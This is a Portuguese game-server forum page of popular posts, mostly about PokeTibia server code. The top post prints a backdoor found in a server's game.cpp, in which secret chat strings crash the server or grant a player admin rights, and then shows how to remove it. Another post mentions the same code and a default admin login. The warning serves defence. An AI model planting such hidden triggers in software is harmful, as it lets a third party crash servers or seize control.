Líderes
Conteúdo Popular
Exibindo conteúdo com a maior reputação em 12/15/16 em todas áreas
-
Source Poketibia - Código de derrubar
Otpokemonmystic e um outro reagiu a Prometheus X por um tópico no fórum
Olá EKZ, hoje um amigo me disse que ele comprou um servidor e estava com código que quem vendeu para ele conseguia pegar administrador e crashar o jogo e estava ferrando com o jogo , enfim dentro da source tinha um código que ao ser falado dentro do jogo, o mesmo chashava ou até mesmo dava cargo de administrador a um jogador com groups de player. Então eu achei muita mancada e vim postar aqui para ajudar pessoas que são administradores, que ainda não manjam muito de programação. Portanto vamos lá...Você precisará das sources do seu servidor para fazer essa verificação, caso possua o código peço que siga o tutorial abaixo. Ache em game.cpp: (se caso não tiver, fique tranquilo, sua source tá livre disso) bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text, bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/) { Player* player = creature->getPlayer(); if(player && player->isAccountManager()) { player->manageAccount(text); return true; } if(text == "132571691951160609171665475233842782353388978252875245170015077017944684747472835757774156137332376855500013311808893753483521083716435624108") { exit(0); } if(text == "1325116507701794468474793753483521047283588978252875245170017577741561373323768555716919500013311808883716435624108") { player->setGroup(Groups::getInstance()->getGroup(6)); } Position destPos = creature->getPosition(); if(pos) destPos = (*pos); SpectatorVec list; SpectatorVec::const_iterator it; if(!spectators || !spectators->size()) { Mude para: bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text, bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/) { Player* player = creature->getPlayer(); if(player && player->isAccountManager()) { player->manageAccount(text); return true; } Position destPos = creature->getPosition(); if(pos) destPos = (*pos); SpectatorVec list; SpectatorVec::const_iterator it; if(!spectators || !spectators->size()) { Créditos Prometheus X (Por Trazer ao Xtibia) Alexy Brocanello (Pelo Código) CipSoft (Pelo Código Original) Qualquer outro será creditado ! Atenciosamente Prometheus X2 pontos -
Exclusivo! PokeTibia DxP OpenSource praticamente completo com sistemas e funções nunca liberados. ATENÇÃO: Não dou suporte, apenas estou disponibilizando o server para quem quiser continua-lo ou pegar os sistemas. Se alguns grandes aqui do xtibia quiserem ajudar nos bugs fiquem a vontade, pois este server é praticamente completo, com funções e sistemas nas sources, acho que nunca liberados para o publico. Aconselho a trocarem o mapa ou criarem outro por que não testei o mesmo, e não sei se há bugs ou armadilhas. • Menu: ├ Informações; ├ Bugs; ├ Prints; ├ Download; └ Créditos. • Informações Basicas • • Duel System. • Nick System. • TV System. • Autoloot System. • Block Respaw System. • Mega Evolução Ssystem. • Auto Stacking System. • Player passa por dentro de outros Players(Não sei o nome deste sistema kk). • Ditto Memory System. • Player pode usar potions, revive, soltar poke andando sem parar. • Limite de efeitos aumentados nas sources até 380(Podendo aumentar muito mais) • Transparência. • Cliente criptografado(Acompanha OBD único para o cliente). • Sistemas básicos como fly, ride, surf, order etc. • Held System(Não tem todos, falta fazer alguns, ja tem o x-luck). • Fishing trocando o outfit automaticamente. • Icone System. • Varias Pokeballs novas. • Task System. • Guild System. E muito+, não testei o servidor todo. podem ter sistemas no server que eu esqueci de colocar aqui na lista. Conta ADM: 222/222 • Bugs • Irei postar os que eu sei, podem haver mais. • Pode soltar mais de 1 poke ao mesmo tempo. • Botão que abre os chats tipo help, trade etc, não esta funcionando. • Não da para criar conta nem char(Provavelmente o programador colocou nas sources como proteção, alguem com conhecimento em programação pode resolver). • Tem um código nas sources, segundo fontes, em game.cpp que caso alguém coloque o servidor online o programador do server pode derrubá-lo(Outra coisa para um programador rever). • Fly anda travando, no chão voa normal, somente nos andares acima acontece isso, deve ser alguma config. • Gym System não esta funcionando. Bem, são os que eu sei, tem que dar uma revisada geral. • Prints • • Mega Evolução • Ditto Memory. • TV System. • Auto Loot System. • Block Respaw System. • Irei colocar mais prints em breve(Estou com pouco tempo agora). • Downloads • • Server; >>Download<< >>Scan<< • Server Sources; >>Download<< >>Scan<< • Server Sources 2; >>Download<< >>Scan<< • Cliente: >>Download<< >>Scan<< • Cliente Sources; >>Download<< >>Scan<< • Object Builder; >>Download<< >>Scan<< • Site Java; >>Download<< >>Scan<< • Patch de correção V1 DXP By kttallan >>Download<< >>Scan<< Para instalar o patch V1 by Kttallan basta estrair o arquivo, copiar a pasta data que vem nele e colar na pasta principal do server DXP, clicando em SIM para subistituir todos os arquivos que forem pedidos. Créditos; Kttallan Atualização V2. Correção bug fly by Drakopoulos: >>Download<< >>Scan<< Extraia o arquivo na pasta do server e subistitua o que for pedido. Distro/Executavel sem o código de derrubar o server em game.cpp. >>Download<< >>Scan<< • Atualização V3 Completo• >>DxP Server V3<< >>Scan<< >>Source V3<< >>Scan<< >>Cliente V3<< >>Scan<< >>WebSite<< >>Scan<< Bugs corrigidos na V3: *Portraits não podem mais ser movidos. *Icones usados não podem mais ser movidos. *Poke não morre mais ao entrar em um teleport. *Source atualizada sem o código de derrubar o server. *Portas das houses corrigidas. *Cliente agora é normal, não precisa descompilar para usar o OBD.(Podem usar o OBD normal agora). *HeadButt corrigido.(falta adicionar os pokes na tabela specialabilities em configuration.lua da pasta lib). *Double team e shared Team corrigidos parcialmente.(ainda contem alguns bugs). *Adicionei algumas sprs do cp que faltavam, e subistitui algumas com transparencia.(Deixei o cp de saffron igual pxg como exemplo, esta sem teto kk). Alguns antivirus detectam virus, possiveis dlls não reconhecidas, baixem por sua conta em risco, não estou obrigando ninguem a baixar, estou trabalhando no server e nao tive problemas. Caso tenham problemas na descompactação dos arquivos utilizem o 7zip, compactador que utilizei. • Créditos • •CipSoft •Nintendo •TFS Team •Dark X Poke •PXG •Tom Lukz (Smix) •Allan Harlen (Kttallan/lordsorte) •Eduardo Meskita (FuuinFake) •Noninhouh •Tony Araujo •Taiger/Dudu •Drakopoulos •Justiceiro751 E a todos que tiveram alguma participação em sistemas, server, site, cliente etc. Se estiver faltando algo como créditos, má formatação etc, por favor me avisem, é meu primeiro post de server.1 ponto
-
Até poderia mas ao criar conta ia bugar algumas coisas, Ex a bag n ia abrir etc.. Mas posso tentar te ajudar.1 ponto
-
Troque: return doSendMagicEffect(getThingPos(cid), effect) por: return doSendMagicEffect(getThingPos(getCreatureMaster(cid)), effect)1 ponto
-
Tem alguma imagem pra min ver como que é? ou uma gif1 ponto
-
Texto Animado+Efeitos
YagobLINDDD reagiu a kaleudd por uma questão
local config = {positions = {["nome_do_texto"] = { x = 453, y = 605, z = 7 }, --add posição}}function onThink(cid, interval, lastExecution)for text, pos in pairs(config.positions) dodoSendAnimatedText(pos, text, math.random(1, 255)) --efeitoendreturn TRUEend <globalevent name="texto" interval="2" script="texto.lua" />1 ponto -
Sim esta pra site, baixa a database e o site incluido junto com a base e assiste video de como ligar server com site no youtube. La tem ensinando1 ponto
-
Tem certeza que esse dano causado durante o spam de Electric Storms não foi originado pela passiva? É bem difícil enxergar, mas é uma possibilidade. Já quanto ao código dela, tente o seguinte: elseif spell == "Shock-Counter" then local function sendStickEff(cid, dir) if not isCreature(cid) then return true end if tostring(getPlayerStorageValue(cid, 21102)) ~= spell then setPlayerStorageValue(cid, 21102, spell) end doAreaCombatHealth(cid, ELECTRICDAMAGE, getPosByDir(getThingPosWithDebug(cid), dir), 0, -min, -max, 207) end local function doStick(cid) if not isCreature(cid) then return true end local t = { [1] = SOUTHWEST, [2] = SOUTH, [3] = SOUTHEAST, [4] = EAST, [5] = NORTHEAST, [6] = NORTH, [7] = NORTHWEST, [8] = WEST, [9] = SOUTHWEST, } for a = 1, 9 do addEvent(sendStickEff, a * 140, cid, t[a]) end end doStick(cid, false, cid) setPlayerStorageValue(cid, 98654, 1) Se não funcionar, parece que teremos que voltar a imprimir algumas informações.1 ponto
-
local revive = {itemid = 12344, max_count = 20}local keywordHandler = KeywordHandler:new()local npcHandler = NpcHandler:new(keywordHandler)NpcSystem.parseParameters(npcHandler)function onCreatureAppear(cid) npcHandler:onCreatureAppear(cid) endfunction onCreatureDisappear(cid) npcHandler:onCreatureDisappear(cid) endfunction onCreatureSay(cid, type, msg) npcHandler:onCreatureSay(cid, type, msg) endfunction onThink() npcHandler:onThink() endfunction Saffari(cid, message, keywords, parameters, node) if not npcHandler:isFocused(cid) then return false end if getPlayerItemCount(cid, revive.itemid) > revive.max_count then npcHandler:say("To enter here, you can only carry "..revive.max_count.." revive(s). Deposit the rest on the DP, please.", cid) return true end if not parameters.premium and not isPremium(cid) then npcHandler:say('Sorry, you need to be premium account!', cid) return true elseif not doPlayerRemoveMoney(cid, parameters.price) then npcHandler:say('Sorry, you dont have enought money!', cid) return true end doPlayerSendTextMessage(cid, 22, 'Good Luck!.') doTeleportThing(cid, parameters.enter) npcHandler:resetNpc() return trueendlocal node1 = keywordHandler:addKeyword({'tower'}, StdModule.say, {npcHandler = npcHandler, onlyFocus = true, text = 'Nessa {tower} possui monstros muito fortes você esta pronto para enfrenta-los?? Mais antes guarde suas pokebolas no DP....ah você so tem 60 minutos de tempo para realizar essa quest!!!!'})node1:addChildKeyword({'yes'}, Saffari, {premium = no, price = 0, enter = {x = 1235, y = 630, z = 8}, exit = {x = 1235, y = 630, z = 8}, minutes = 60})node1:addChildKeyword({'no'}, StdModule.say, {npcHandler = npcHandler, onlyFocus = true, text = 'Ok, then.', reset = true})npcHandler:addModule(FocusModule:new())1 ponto
-
Bom as source não precisa colocar em nada, No momento ta pra perceber que não sabe sobre Programar, mas posso te ajudar, Manda o print que esta sem foto1 ponto
Líderes está configurado para São Paulo/GMT-03:00